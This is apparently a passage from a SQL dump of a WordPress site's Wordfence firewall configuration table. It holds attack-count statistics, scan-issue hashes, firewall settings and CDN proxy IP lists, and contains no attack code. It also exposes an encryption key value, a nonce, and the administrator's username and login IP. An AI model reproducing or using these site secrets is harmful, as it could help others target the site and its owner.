PO��v��DŌi*�b���*�;ةD�ڨ�n�/N��I��}7+ƕ�A���l欿B��t�\'s��t����sh�w��k1]�\':�&e�t��b�t��*�\n\'�Z%��$^���*�B��R_~�;A���k8����\\=�>J����1�~(���Ac�q�o%TF�O-�Gz�JTN>�\'����#.�D�=����a�:��\'j�K�� WHS����`\r�y~E�~|�\nR�i)fl�饔e}�)ld�*�ÀI�F�^��ȯ�ܒ��W���@�~�ݘ�0��(�U��ޕ�M!\0��מ����T���žd�T�`�l�� �9��睪P�k�KV��d��*�X\0M�o��DO=h�W��\0 �7$����R�T�b��z�Hp�f��?�@јݲ�I�����G�]�q�M;��>l\nA���>��k�h���R���8�yO��t�ld�U�^��E�%O��n�~}���J[�An>���P:�����7��4iw����q��c�s� @�\"/��š|sP|0��ô����!�J��[h7e�^�J��T�u�V��څ�6���bJ�R�#��Բ�Yu�n�nO�������#�\r�F1_Ң\'�Sz�<�J8�@�b��c�\niz�N�y��}˜.��\Z�^�����*�̶=������.�)~�� �_OP�\n�x+��U��1�w��z�)�\"4�+�B\\���II�%�%�\"ЖX����~X4;;�]*� �&���\"T�QWvRi��d�3�m�`a��3\r�45q$�&Β9QO*z�kB�������jdE,�Tg�OrP~�tgn�g���(�W�{v����^�Z��}ȐC6ݞ��+�?�۸Z�P�d?P�\\����kO��}H�\"F�+:̵LZ�KA�ry��9H�$�Ī���50K5:\'�Ċ�$��Ժ���x����r�^/���\'�D�~�4�d���`8`q��׆dŪC*�k]�0ɾ\"���Ͷ#8K���r���|\Z�ゐ5�b�T2���ph=��������j�#�jR���� 𪏨�|�z��03��ܸOV1�SlfwV��1 ��l?��.\r��ƨ�;p���-�e*���`���[�p5U���ͳ���{���n���!z[�>�f�t4����s^�tE+W�L�կ��C��ҩχH�h�Z;P��.����s.��1��q�+܋\r�4�$Pd�uU1����8���<Kn�s���p�GR�b�:L��0�j}�y�슟W���Sh�5GH�;�V��(��(�\ZB\0�\r�lŗ���B�s�#3�?+��Wp�P�M�k]�<px_�\"R�Lki��G�Ap�\Z\\���?h��8���Q��$�d1��ˌ�GPP�(�Ϟ���S��3Q�?(H|,�;p��H@yƄ��k}�{��[��W{�LG�.�vOǫ�\"�M\r6Ic�����E��,M+,�ǖ��f�� �MP�[�Y&���\r��,���YDx��x����Vތ�\Z��~�VD���Z6�aW�_�tʩk�g�i\n�B�_��[�\0��7��4�w5���q��y����1�Щ3�&�Tt�ȹ��8��=��S�P�y�Ym���m��U�I���O�F !������q��O�~þ`��Ϸ7�i.K���K�����;��3@��\"��_���d�/5�������%����9�U6>��Nc�V�M�Tp�W \r0�����Z|�\\�T�-��B�D\"�,Q�uܳ��n�����.������A\Z��X�m,��P\r�J�h��x�Q#��\0��tg���F���N���v��&�W\"�IJ�}:���k�S�-e&s�c��1h�ؗ]m3ĺXq�Ï��j�_�y�[+x�E��V0z���xi���\n���F�\n��7��4�欋\\�M�=���O����h������=��ln&�����ă�J�ӗ���~�����l�L;�-��F��\0��U��*/����d�.>z_�ME�MՏ-/v��_څc����?,U&��\"��R�[�R����|L���<uQR�V����x�s�� b[�y�i�C��\0����T�q@W~��{�Ṝg�IU9�\0���ڡSw�q�\\(LpR^��_m�o�<e��{�FE�P\n-����,5H��:��@���\r�%��-�����,$y��k�\\�3�딢ߓ{�B2�A����G�<��&%���w$���c�TV¶\r�|f�7hC�p\Z��8�w�G�+�dUx��Xc�ѨV�*�6�i(���H�Xw�6[�|�Ja�ʹ�Ж�q^����O�h;xA�3�-\r���hM�>kv7��[���ׇd�̂zR<��2���K�����7�I���I�!1&�j��[6����56i�8��n�t��l�*���?���/]�\Z�4�tX�*���5��2�.p�·�\"�F�6Zؙ\n��$z��z��\r�9`\\&S9�~{-LKŝI�T�i��;�u!���7�U�e�H> -��%G��(�m�\0���DO;��^�K��l����ظ!�/?aF�z��#�U�%f��{�x��i�<��f��;������K�Z9ްN��Wj_�H�]�͚V�I�R[냛�B�w�s��bN}�qY��7zo�U��u�\'���1��k���~P,o���ʂ-~�Bʾ�i>1�/#���#��y��X�oa��\\D�Şheb������h��?)�3��1�u��s��_s�Шd��>V�*R��/\0�����ӷ�~r�%�\"������8lb�κ��\"�7e�E�=n~��͙\'2�C/�����r�\r�̈�\r�;�J�U�ˑ-�\\B��?�� C�Q���c2 G������e��h��h��^�@�˶\\},n���ۛ~A�F�,���\"�Ǣ�@�\n�py4&�7�:�wO�h4j�y�D��{�<n�н�>!��2��_U�d~��p��7O\";}ڇ��r5\0','no'),
('currentCronKey','','yes'),
('dashboardData','a:4:{s:9:\"generated\";i:1723447639;s:3:\"tdf\";a:3:{s:9:\"community\";i:6187;s:7:\"premium\";i:6261;s:9:\"blacklist\";i:6024;}s:10:\"attackdata\";a:3:{s:3:\"24h\";a:24:{i:0;a:2:{s:1:\"t\";i:1723359600;s:1:\"c\";i:15078623;}i:1;a:2:{s:1:\"t\";i:1723363200;s:1:\"c\";i:13321653;}i:2;a:2:{s:1:\"t\";i:1723366800;s:1:\"c\";i:14447302;}i:3;a:2:{s:1:\"t\";i:1723370400;s:1:\"c\";i:15839740;}i:4;a:2:{s:1:\"t\";i:1723374000;s:1:\"c\";i:15484699;}i:5;a:2:{s:1:\"t\";i:1723377600;s:1:\"c\";i:12297478;}i:6;a:2:{s:1:\"t\";i:1723381200;s:1:\"c\";i:9211901;}i:7;a:2:{s:1:\"t\";i:1723384800;s:1:\"c\";i:8935500;}i:8;a:2:{s:1:\"t\";i:1723388400;s:1:\"c\";i:9232703;}i:9;a:2:{s:1:\"t\";i:1723392000;s:1:\"c\";i:9134709;}i:10;a:2:{s:1:\"t\";i:1723395600;s:1:\"c\";i:8896504;}i:11;a:2:{s:1:\"t\";i:1723399200;s:1:\"c\";i:9106700;}i:12;a:2:{s:1:\"t\";i:1723402800;s:1:\"c\";i:8992130;}i:13;a:2:{s:1:\"t\";i:1723406400;s:1:\"c\";i:8870376;}i:14;a:2:{s:1:\"t\";i:1723410000;s:1:\"c\";i:8995833;}i:15;a:2:{s:1:\"t\";i:1723413600;s:1:\"c\";i:8874734;}i:16;a:2:{s:1:\"t\";i:1723417200;s:1:\"c\";i:8914164;}i:17;a:2:{s:1:\"t\";i:1723420800;s:1:\"c\";i:8811153;}i:18;a:2:{s:1:\"t\";i:1723424400;s:1:\"c\";i:12894170;}i:19;a:2:{s:1:\"t\";i:1723428000;s:1:\"c\";i:12257903;}i:20;a:2:{s:1:\"t\";i:1723431600;s:1:\"c\";i:12296968;}i:21;a:2:{s:1:\"t\";i:1723435200;s:1:\"c\";i:12307712;}i:22;a:2:{s:1:\"t\";i:1723438800;s:1:\"c\";i:12022145;}i:23;a:2:{s:1:\"t\";i:1723442400;s:1:\"c\";i:12692468;}}s:2:\"7d\";a:7:{i:0;a:2:{s:1:\"t\";i:1722816000;s:1:\"c\";i:348982373;}i:1;a:2:{s:1:\"t\";i:1722902400;s:1:\"c\";i:285860208;}i:2;a:2:{s:1:\"t\";i:1722988800;s:1:\"c\";i:303428204;}i:3;a:2:{s:1:\"t\";i:1723075200;s:1:\"c\";i:280178699;}i:4;a:2:{s:1:\"t\";i:1723161600;s:1:\"c\";i:342421836;}i:5;a:2:{s:1:\"t\";i:1723248000;s:1:\"c\";i:322920991;}i:6;a:2:{s:1:\"t\";i:1723334400;s:1:\"c\";i:301164963;}}s:3:\"30d\";a:30:{i:0;a:2:{s:1:\"t\";i:1720828800;s:1:\"c\";i:243884051;}i:1;a:2:{s:1:\"t\";i:1720915200;s:1:\"c\";i:316701935;}i:2;a:2:{s:1:\"t\";i:1721001600;s:1:\"c\";i:273639475;}i:3;a:2:{s:1:\"t\";i:1721088000;s:1:\"c\";i:308205457;}i:4;a:2:{s:1:\"t\";i:1721174400;s:1:\"c\";i:348721477;}i:5;a:2:{s:1:\"t\";i:1721260800;s:1:\"c\";i:355573017;}i:6;a:2:{s:1:\"t\";i:1721347200;s:1:\"c\";i:322465688;}i:7;a:2:{s:1:\"t\";i:1721433600;s:1:\"c\";i:305828413;}i:8;a:2:{s:1:\"t\";i:1721520000;s:1:\"c\";i:324992949;}i:9;a:2:{s:1:\"t\";i:1721606400;s:1:\"c\";i:317053582;}i:10;a:2:{s:1:\"t\";i:1721692800;s:1:\"c\";i:294361952;}i:11;a:2:{s:1:\"t\";i:1721779200;s:1:\"c\";i:270818538;}i:12;a:2:{s:1:\"t\";i:1721865600;s:1:\"c\";i:271743485;}i:13;a:2:{s:1:\"t\";i:1721952000;s:1:\"c\";i:252063856;}i:14;a:2:{s:1:\"t\";i:1722038400;s:1:\"c\";i:298771187;}i:15;a:2:{s:1:\"t\";i:1722124800;s:1:\"c\";i:269849386;}i:16;a:2:{s:1:\"t\";i:1722211200;s:1:\"c\";i:349737379;}i:17;a:2:{s:1:\"t\";i:1722297600;s:1:\"c\";i:348481800;}i:18;a:2:{s:1:\"t\";i:1722384000;s:1:\"c\";i:327098750;}i:19;a:2:{s:1:\"t\";i:1722470400;s:1:\"c\";i:306506477;}i:20;a:2:{s:1:\"t\";i:1722556800;s:1:\"c\";i:332045090;}i:21;a:2:{s:1:\"t\";i:1722643200;s:1:\"c\";i:321387533;}i:22;a:2:{s:1:\"t\";i:1722729600;s:1:\"c\";i:269657441;}i:23;a:2:{s:1:\"t\";i:1722816000;s:1:\"c\";i:348982373;}i:24;a:2:{s:1:\"t\";i:1722902400;s:1:\"c\";i:285860208;}i:25;a:2:{s:1:\"t\";i:1722988800;s:1:\"c\";i:303428204;}i:26;a:2:{s:1:\"t\";i:1723075200;s:1:\"c\";i:280178699;}i:27;a:2:{s:1:\"t\";i:1723161600;s:1:\"c\";i:342421836;}i:28;a:2:{s:1:\"t\";i:1723248000;s:1:\"c\";i:322920991;}i:29;a:2:{s:1:\"t\";i:1723334400;s:1:\"c\";i:301164963;}}}s:9:\"countries\";a:1:{s:2:\"7d\";a:10:{i:0;a:2:{s:2:\"cd\";s:2:\"US\";s:2:\"ct\";i:655558740;}i:1;a:2:{s:2:\"cd\";s:2:\"NL\";s:2:\"ct\";i:256383773;}i:2;a:2:{s:2:\"cd\";s:2:\"SG\";s:2:\"ct\";i:195700798;}i:3;a:2:{s:2:\"cd\";s:2:\"DE\";s:2:\"ct\";i:181988571;}i:4;a:2:{s:2:\"cd\";s:2:\"FR\";s:2:\"ct\";i:134236718;}i:5;a:2:{s:2:\"cd\";s:2:\"IN\";s:2:\"ct\";i:105469595;}i:6;a:2:{s:2:\"cd\";s:2:\"GB\";s:2:\"ct\";i:84302639;}i:7;a:2:{s:2:\"cd\";s:2:\"CN\";s:2:\"ct\";i:74584482;}i:8;a:2:{s:2:\"cd\";s:2:\"VN\";s:2:\"ct\";i:57802075;}i:9;a:2:{s:2:\"cd\";s:2:\"ID\";s:2:\"ct\";i:40998216;}}}}','no'),
('dbTest','a:1:{s:5:\"nonce\";s:64:\"fa8ba220695390c532b10c7bb012fc75fe6d65e315a80a82b3624804ced38c93\";}','no'),
('dbVersion','10.11.8-MariaDB-0ubuntu0.24.04.1','yes'),
('debugOn','0','yes'),
('deleteTablesOnDeact','0','yes'),
('detectProxyNextCheck','1723608017','no'),
('detectProxyNonce','','no'),
('detectProxyRecommendation','REMOTE_ADDR','no'),
('diagnosticsWflogsRemovalHistory','[]','no'),
('disableCodeExecutionUploads','0','yes'),
('disableConfigCaching','0','yes'),
('disableWAFIPBlocking','0','yes'),
('disclosureStates','a:2:{s:20:\"wf-scan-activity-log\";b:1;s:32:\"wf-diagnostics-debugging-options\";b:1;}','yes'),
('dismissAutoPrependNotice','1','yes'),
('displayAutomaticBlocks','1','yes'),
('displayTopLevelBlocking','0','yes'),
('displayTopLevelLiveTraffic','0','yes'),
('displayTopLevelOptions','1','yes'),
('emailedIssuesList','a:32:{i:0;a:2:{s:7:\"ignoreC\";s:32:\"2bc7b57073438a4912497208dbfdb881\";s:7:\"ignoreP\";s:32:\"3c1d4fc8678b4beb9a98667a011b440f\";}i:1;a:2:{s:7:\"ignoreC\";s:32:\"12329628fb169b64f63d529340279abc\";s:7:\"ignoreP\";s:32:\"7f10559c4abcb9b86167840184d08be1\";}i:2;a:2:{s:7:\"ignoreC\";s:32:\"3fef8ae786d4cac0825eeb553b0e50b4\";s:7:\"ignoreP\";s:32:\"b8f6b5eb8ad952489262cf5cb73af8d3\";}i:3;a:2:{s:7:\"ignoreC\";s:32:\"3fec193704ee3c111f55b474f8b1c4c0\";s:7:\"ignoreP\";s:32:\"8cba2c6e98c882b55a31d9d3cba2b1dc\";}i:4;a:2:{s:7:\"ignoreC\";s:32:\"136e7f13a49deab2dee07a1ba1fbf93f\";s:7:\"ignoreP\";s:32:\"e8344e041d720bd292dbf98e82b949e2\";}i:5;a:2:{s:7:\"ignoreC\";s:32:\"1b7d42a57f38cbb8deb87226fc3073da\";s:7:\"ignoreP\";s:32:\"fb47975e3f9353092c6b71ad2e78a41b\";}i:6;a:2:{s:7:\"ignoreC\";s:32:\"682d766f017deee9ab5766072f3bf71a\";s:7:\"ignoreP\";s:32:\"1c8e5d1026b91ec70b32cc16130da9f4\";}i:7;a:2:{s:7:\"ignoreC\";s:32:\"425ca6cf2c1fba964e354ed1f2829155\";s:7:\"ignoreP\";s:32:\"524820818be5ff05fd1c174cba9a5c3b\";}i:8;a:2:{s:7:\"ignoreC\";s:32:\"4b8271221cd1f35f050d0dd8835322ff\";s:7:\"ignoreP\";s:32:\"4ef1c9cd59aa43a8d4bf2c7c821af949\";}i:9;a:2:{s:7:\"ignoreC\";s:32:\"8f091cb9c1648f0330f493032c272e06\";s:7:\"ignoreP\";s:32:\"dac118f368d3080ac214c6f3f5c68361\";}i:10;a:2:{s:7:\"ignoreC\";s:32:\"016b3b65b16a667cb816745f79ae7d95\";s:7:\"ignoreP\";s:32:\"144f56bc444dad9addbe5a3b19267948\";}i:11;a:2:{s:7:\"ignoreC\";s:32:\"7d8fe04ae9360b9e458fe9bee170b84d\";s:7:\"ignoreP\";s:32:\"825401b3f6c03f523d444201effd1fa6\";}i:12;a:2:{s:7:\"ignoreC\";s:32:\"b7b75bfcfcafb976dab832c2587a5b4b\";s:7:\"ignoreP\";s:32:\"912b8a89380aec2e57476e479eaff290\";}i:13;a:2:{s:7:\"ignoreC\";s:32:\"e921019b54358e532401274f8d6f0e9c\";s:7:\"ignoreP\";s:32:\"560080010dfe1f801ee80efa7a2895d7\";}i:14;a:2:{s:7:\"ignoreC\";s:32:\"91da30919c3c79fcdbc413cd5126fd28\";s:7:\"ignoreP\";s:32:\"08ac9475c39e31c0902d04c8ed8d66cd\";}i:15;a:2:{s:7:\"ignoreC\";s:32:\"2ea482ec0135a9c924ac01550cc3bb1e\";s:7:\"ignoreP\";s:32:\"2f3258fa3f10d3a4066b873297ec79b0\";}i:16;a:2:{s:7:\"ignoreC\";s:32:\"d9234e9bd9234f3087a8732e1c3b1882\";s:7:\"ignoreP\";s:32:\"9a1f878b6fd80a86c997e0ecdb5944b3\";}i:17;a:2:{s:7:\"ignoreC\";s:32:\"ea20969ab425369fdaabc1624e8daaed\";s:7:\"ignoreP\";s:32:\"825b157a39057be4756345ee47a5985d\";}i:18;a:2:{s:7:\"ignoreC\";s:32:\"1743b15ab01b8db540482fe6c8f30959\";s:7:\"ignoreP\";s:32:\"7caf2f8e8dfcc9eb76f86ee1a804d62f\";}i:19;a:2:{s:7:\"ignoreC\";s:32:\"27a915c9125ae76ff08f6d33f08c15ee\";s:7:\"ignoreP\";s:32:\"27a915c9125ae76ff08f6d33f08c15ee\";}i:20;a:2:{s:7:\"ignoreC\";s:32:\"e635cfe89bbeccf0d5082bfc79e322a2\";s:7:\"ignoreP\";s:32:\"e635cfe89bbeccf0d5082bfc79e322a2\";}i:21;a:2:{s:7:\"ignoreC\";s:32:\"d31b45f1342b2cf27be6c7794e5ea312\";s:7:\"ignoreP\";s:32:\"b8210bb797cf709e9e3d195fa6d90dfe\";}i:22;a:2:{s:7:\"ignoreC\";s:32:\"afd532cb666b1ffbe0bf399f06b1bd7f\";s:7:\"ignoreP\";s:32:\"e9af8bb29b0351eab484834ae5f393df\";}i:23;a:2:{s:7:\"ignoreC\";s:32:\"9435e1b758003dd1c7b669351a4d2200\";s:7:\"ignoreP\";s:32:\"8e2f77e51b627ccccfc8d857d632f8aa\";}i:24;a:2:{s:7:\"ignoreC\";s:32:\"486aca5d04eb568b7718918adcff0a1e\";s:7:\"ignoreP\";s:32:\"758af7ce24dd8c1723a1103153b39fe0\";}i:25;a:2:{s:7:\"ignoreC\";s:32:\"9940ba914572baeb416e01cffc244baa\";s:7:\"ignoreP\";s:32:\"8c8f1321acdac74c2b34ccd8b90805d0\";}i:26;a:2:{s:7:\"ignoreC\";s:32:\"cd5762ec290a76996ff46917964371f6\";s:7:\"ignoreP\";s:32:\"cd5762ec290a76996ff46917964371f6\";}i:27;a:2:{s:7:\"ignoreC\";s:32:\"dd4693babb65167a24ef6d7874a75bca\";s:7:\"ignoreP\";s:32:\"dd4693babb65167a24ef6d7874a75bca\";}i:28;a:2:{s:7:\"ignoreC\";s:32:\"66a79532e9fc780933924c2808f5cb5c\";s:7:\"ignoreP\";s:32:\"66a79532e9fc780933924c2808f5cb5c\";}i:29;a:2:{s:7:\"ignoreC\";s:32:\"dc06b44f1b17e5e34a4014657d1a2f47\";s:7:\"ignoreP\";s:32:\"c953b8a4cfe92ca8b0f4d832eebcc80b\";}i:30;a:2:{s:7:\"ignoreC\";s:32:\"114d3f6cc78099138c7197127bcd170f\";s:7:\"ignoreP\";s:32:\"05bb5677cd06ca8ab34749c87f936281\";}i:31;a:2:{s:7:\"ignoreC\";s:32:\"7e09033ac06b30c5d4b9c1557eccc7d3\";s:7:\"ignoreP\";s:32:\"7e09033ac06b30c5d4b9c1557eccc7d3\";}}','no'),
('email_summary_dashboard_widget_enabled','1','yes'),
('email_summary_enabled','1','yes'),
('email_summary_excluded_directories','wp-content/cache,wp-content/wflogs','yes'),
('email_summary_interval','weekly','yes'),
('enableRemoteIpLookup','1','yes'),
('encKey','c7037f854ff97755','yes'),
('fileContentsGSB6315Migration','1','yes'),
('firewallEnabled','1','yes'),
('hasKeyConflict','0','yes'),
('howGetIPs','','yes'),
('howGetIPs_trusted_proxies','','yes'),
('howGetIPs_trusted_proxy_preset','','yes'),
('ipResolutionList','{\"cloudfront\":{\"name\":\"Amazon CloudFront\",\"ipv4\":[\"120.52.22.96\\/27\",\"205.251.249.0\\/24\",\"180.163.57.128\\/26\",\"204.246.168.0\\/22\",\"111.13.171.128\\/26\",\"18.160.0.0\\/15\",\"205.251.252.0\\/23\",\"54.192.0.0\\/16\",\"204.246.173.0\\/24\",\"54.230.200.0\\/21\",\"120.253.240.192\\/26\",\"116.129.226.128\\/26\",\"130.176.0.0\\/17\",\"108.156.0.0\\/14\",\"99.86.0.0\\/16\",\"13.32.0.0\\/15\",\"120.253.245.128\\/26\",\"13.224.0.0\\/14\",\"70.132.0.0\\/18\",\"15.158.0.0\\/16\",\"111.13.171.192\\/26\",\"13.249.0.0\\/16\",\"18.238.0.0\\/15\",\"18.244.0.0\\/15\",\"205.251.208.0\\/20\",\"3.165.0.0\\/16\",\"3.168.0.0\\/14\",\"65.9.128.0\\/18\",\"130.176.128.0\\/18\",\"58.254.138.0\\/25\",\"205.251.201.0\\/24\",\"205.251.206.0\\/23\",\"54.230.208.0\\/20\",\"3.160.0.0\\/14\",\"116.129.226.0\\/25\",\"52.222.128.0\\/17\",\"18.164.0.0\\/15\",\"111.13.185.32\\/27\",\"64.252.128.0\\/18\",\"205.251.254.0\\/24\",\"3.166.0.0\\/15\",\"54.230.224.0\\/19\",\"71.152.0.0\\/17\",\"216.137.32.0\\/19\",\"204.246.172.0\\/24\",\"205.251.202.0\\/23\",\"18.172.0.0\\/15\",\"120.52.39.128\\/27\",\"118.193.97.64\\/26\",\"3.164.64.0\\/18\",\"18.154.0.0\\/15\",\"54.240.128.0\\/18\",\"205.251.250.0\\/23\",\"180.163.57.0\\/25\",\"52.46.0.0\\/18\",\"52.82.128.0\\/19\",\"54.230.0.0\\/17\",\"54.230.128.0\\/18\",\"54.239.128.0\\/18\",\"130.176.224.0\\/20\",\"36.103.232.128\\/26\",\"52.84.0.0\\/15\",\"143.204.0.0\\/16\",\"144.220.0.0\\/16\",\"120.52.153.192\\/26\",\"119.147.182.0\\/25\",\"120.232.236.0\\/25\",\"111.13.185.64\\/27\",\"3.164.0.0\\/18\",\"54.182.0.0\\/16\",\"58.254.138.128\\/26\",\"120.253.245.192\\/27\",\"54.239.192.0\\/19\",\"18.68.0.0\\/16\",\"18.64.0.0\\/14\",\"120.52.12.64\\/26\",\"99.84.0.0\\/16\",\"205.251.204.0\\/23\",\"130.176.192.0\\/19\",\"52.124.128.0\\/17\",\"205.251.200.0\\/24\",\"204.246.164.0\\/22\",\"13.35.0.0\\/16\",\"204.246.174.0\\/23\",\"3.164.128.0\\/17\",\"3.172.0.0\\/18\",\"36.103.232.0\\/25\",\"119.147.182.128\\/26\",\"118.193.97.128\\/25\",\"120.232.236.128\\/26\",\"204.246.176.0\\/20\",\"65.8.0.0\\/16\",\"65.9.0.0\\/17\",\"108.138.0.0\\/15\",\"120.253.241.160\\/27\",\"64.252.64.0\\/18\",\"13.113.196.64\\/26\",\"13.113.203.0\\/24\",\"52.199.127.192\\/26\",\"13.124.199.0\\/24\",\"3.35.130.128\\/25\",\"52.78.247.128\\/26\",\"13.233.177.192\\/26\",\"15.207.13.128\\/25\",\"15.207.213.128\\/25\",\"52.66.194.128\\/26\",\"13.228.69.0\\/24\",\"47.129.82.0\\/24\",\"47.129.83.0\\/24\",\"47.129.84.0\\/24\",\"52.220.191.0\\/26\",\"13.210.67.128\\/26\",\"13.54.63.128\\/26\",\"3.107.43.128\\/25\",\"3.107.44.0\\/25\",\"3.107.44.128\\/25\",\"43.218.56.128\\/26\",\"43.218.56.192\\/26\",\"43.218.56.64\\/26\",\"43.218.71.0\\/26\",\"99.79.169.0\\/24\",\"18.192.142.0\\/23\",\"18.199.68.0\\/22\",\"18.199.72.0\\/22\",\"18.199.76.0\\/22\",\"35.158.136.0\\/24\",\"52.57.254.0\\/24\",\"18.200.212.0\\/23\",\"52.212.248.0\\/26\",\"18.175.65.0\\/24\",\"18.175.66.0\\/24\",\"18.175.67.0\\/24\",\"3.10.17.128\\/25\",\"3.11.53.0\\/24\",\"52.56.127.0\\/25\",\"15.188.184.0\\/24\",\"52.47.139.0\\/24\",\"3.29.40.128\\/26\",\"3.29.40.192\\/26\",\"3.29.40.64\\/26\",\"3.29.57.0\\/26\",\"18.229.220.192\\/26\",\"18.230.229.0\\/24\",\"18.230.230.0\\/25\",\"54.233.255.128\\/26\",\"3.231.2.0\\/25\",\"3.234.232.224\\/27\",\"3.236.169.192\\/26\",\"3.236.48.0\\/23\",\"34.195.252.0\\/24\",\"34.226.14.0\\/24\",\"44.220.194.0\\/23\",\"44.220.196.0\\/23\",\"44.220.198.0\\/23\",\"44.220.200.0\\/23\",\"44.220.202.0\\/23\",\"44.222.66.0\\/24\",\"13.59.250.0\\/26\",\"18.216.170.128\\/25\",\"3.128.93.0\\/24\",\"3.134.215.0\\/24\",\"3.146.232.0\\/22\",\"3.147.164.0\\/22\",\"3.147.244.0\\/22\",\"52.15.127.128\\/26\",\"3.101.158.0\\/23\",\"52.52.191.128\\/26\",\"34.216.51.0\\/25\",\"34.223.12.224\\/27\",\"34.223.80.192\\/26\",\"35.162.63.192\\/26\",\"35.167.191.128\\/26\",\"35.93.168.0\\/23\",\"35.93.170.0\\/23\",\"35.93.172.0\\/23\",\"44.227.178.0\\/24\",\"44.234.108.128\\/25\",\"44.234.90.252\\/30\"],\"ipv6\":[\"2600:9000:3000::\\/36\",\"2600:9000:f600::\\/39\",\"2600:9000:f540::\\/42\",\"2409:8c00:2421:300::\\/56\",\"2600:9000:f000::\\/38\",\"2600:9000:f500::\\/43\",\"2600:9000:ddd::\\/48\",\"2600:9000:f800::\\/37\",\"2600:9000:f400::\\/40\",\"2600:9000:f538::\\/45\",\"2600:9000:5380::\\/41\",\"2600:9000:1000::\\/36\",\"2600:9000:2000::\\/36\",\"2400:7fc0:500::\\/40\",\"2600:9000:4000::\\/36\",\"2600:9000:fff::\\/48\",\"2409:8c00:2421:400::\\/56\",\"2404:c2c0:500::\\/40\",\"2600:9000:5308::\\/45\",\"2600:9000:f534::\\/46\",\"2600:9000:f520::\\/44\",\"2600:9000:5320::\\/43\",\"2600:9000:5310::\\/44\",\"2600:9000:f580::\\/41\",\"2600:9000:5340::\\/42\",\"2600:9000:eee::\\/48\",\"2600:9000:5200::\\/40\"],\"timestamp\":1722541989},\"ezoic\":{\"name\":\"Ezoic\",\"timestamp\":1698348469,\"ipv4\":[\"52.20.63.25\",\"3.225.202.138\",\"3.217.200.190\",\"54.212.71.227\",\"52.12.170.68\",\"34.218.21.81\",\"3.7.90.144\",\"13.127.240.219\",\"18.139.6.69\",\"18.140.184.0\",\"3.106.6.164\",\"3.106.176.6\",\"13.237.131.67\",\"15.222.77.144\",\"15.222.108.52\",\"18.157.131.187\",\"18.157.105.182\",\"3.126.25.160\",\"34.248.174.237\",\"52.16.85.139\",\"34.255.61.232\",\"15.236.165.82\",\"15.236.137.228\",\"15.236.166.30\",\"18.228.20.129\",\"18.228.107.195\"],\"ipv6\":[\"2600:1f10:4c55:e200::\\/56\",\"2600:1f13:393:600::\\/56\",\"2406:da1a:e10::\\/56\",\"2406:da18:9d0:1400::\\/56\",\"2406:da1c:58a:e100::\\/56\",\"2600:1f11:f39:6f00::\\/56\",\"2a05:d014:776:a600::\\/56\",\"2a05:d018:dd:7800::\\/56\",\"2a05:d012:4d8:6800::\\/56\",\"2600:1f1e:342:2f00::\\/56\"]},\"quic-cloud\":{\"name\":\"Quic.cloud\",\"timestamp\":1722578402,\"ipv4\":[\"102.221.36.98\",\"102.221.36.99\",\"103.146.63.42\",\"103.152.118.219\",\"103.152.118.72\",\"103.164.203.163\",\"103.188.22.12\",\"103.28.90.190\",\"103.75.117.169\",\"104.225.142.116\",\"104.244.77.37\",\"108.61.158.223\",\"109.248.43.195\",\"135.148.120.32\",\"136.243.106.228\",\"141.164.38.65\",\"145.239.252.65\",\"146.88.239.197\",\"147.78.0.165\",\"147.78.3.13\",\"147.78.3.161\",\"149.248.44.108\",\"149.28.136.245\",\"149.28.47.113\",\"149.28.85.239\",\"152.228.171.66\",\"152.53.36.14\",\"155.138.221.81\",\"156.67.218.140\",\"157.90.154.114\",\"158.51.123.249\",\"162.254.117.80\",\"162.254.118.29\",\"163.182.174.161\",\"163.47.21.168\",\"164.52.202.100\",\"167.71.185.204\",\"167.88.61.211\",\"170.249.218.98\",\"178.17.171.177\",\"178.22.124.247\",\"178.22.124.251\",\"178.255.220.12\",\"18.192.146.200\",\"185.116.60.231\",\"185.116.60.232\",\"185.126.237.129\",\"185.205.187.233\",\"185.212.169.91\",\"185.228.26.40\",\"185.53.57.40\",\"185.53.57.89\",\"188.172.228.182\",\"188.172.229.113\",\"188.64.184.71\",\"190.92.176.5\",\"191.96.101.140\",\"192.248.156.201\",\"192.99.38.117\",\"193.203.191.189\",\"194.163.134.104\",\"194.36.144.221\",\"195.231.17.141\",\"198.38.89.73\",\"199.59.247.242\",\"200.58.127.145\",\"201.182.97.70\",\"202.182.123.93\",\"202.61.226.253\",\"204.10.163.237\",\"209.124.84.191\",\"209.208.26.218\",\"211.23.143.87\",\"213.159.1.75\",\"213.183.48.170\",\"213.184.85.245\",\"216.238.106.164\",\"216.238.71.13\",\"216.250.96.181\",\"23.95.73.167\",\"27.131.75.40\",\"27.131.75.41\",\"31.131.4.244\",\"31.22.115.186\",\"34.247.229.180\",\"34.249.110.197\",\"38.101.149.196\",\"38.114.121.40\",\"38.54.30.31\",\"38.54.42.235\",\"38.54.79.187\",\"38.60.253.237\",\"41.185.29.210\",\"41.223.52.170\",\"45.124.65.86\",\"45.132.244.92\",\"45.248.77.61\",\"45.32.123.201\",\"45.32.169.55\",\"45.32.183.112\",\"45.32.210.159\",\"45.32.67.144\",\"45.32.77.223\",\"45.63.67.181\",\"45.76.252.131\",\"45.77.148.74\",\"45.77.233.177\",\"46.250.220.133\",\"49.12.102.29\",\"5.134.119.103\",\"5.134.119.194\",\"5.188.183.13\",\"5.189.146.228\",\"51.79.221.227\",\"51.81.186.219\",\"51.81.33.156\",\"54.246.224.74\",\"54.36.103.97\",\"61.219.247.87\",\"61.219.247.90\",\"64.176.4.251\",\"64.227.16.93\",\"65.108.104.232\",\"65.20.75.178\",\"65.21.81.50\",\"65.21.81.51\",\"66.42.124.101\",\"69.50.95.216\",\"70.34.205.229\",\"79.172.239.249\",\"81.31.156.245\",\"81.31.156.246\",\"83.229.71.151\",\"86.105.14.231\",\"86.105.14.232\",\"89.58.38.4\",\"91.201.67.57\",\"91.228.7.67\",\"92.118.205.75\",\"93.95.227.66\",\"94.75.232.90\",\"95.179.133.28\",\"95.216.116.209\"],\"ipv6\":[]}}','yes'),
('ipResolutionListHash','bfc6fd856a510267ae88882d2a330712b41fd75b054606994a5affb0322ec61b','yes'),
('isPaid','1','yes'),
('keyExp15Sent','','yes'),
('keyExp1Sent','','yes'),
('keyExp2Sent','','yes'),
('keyExp7Sent','','yes'),
('keyExpDays','365','yes'),
('keyExpFinalSent','','yes'),
('keyType','free','yes'),
('lastAdminLogin','a:6:{s:6:\"userID\";i:1;s:8:\"username\";s:6:\"masoud\";s:9:\"firstName\";s:0:\"\";s:8:\"lastName\";s:0:\"\";s:4:\"time\";s:28:\"Mon 12th August @ 07:29:26AM\";s:2:\"IP\";s:15:\"178.252.180.169\";}','yes'),
('lastAttackDataSendId','22184','yes'),
('lastAttackDataSendTime','1723003559.599078','yes'),
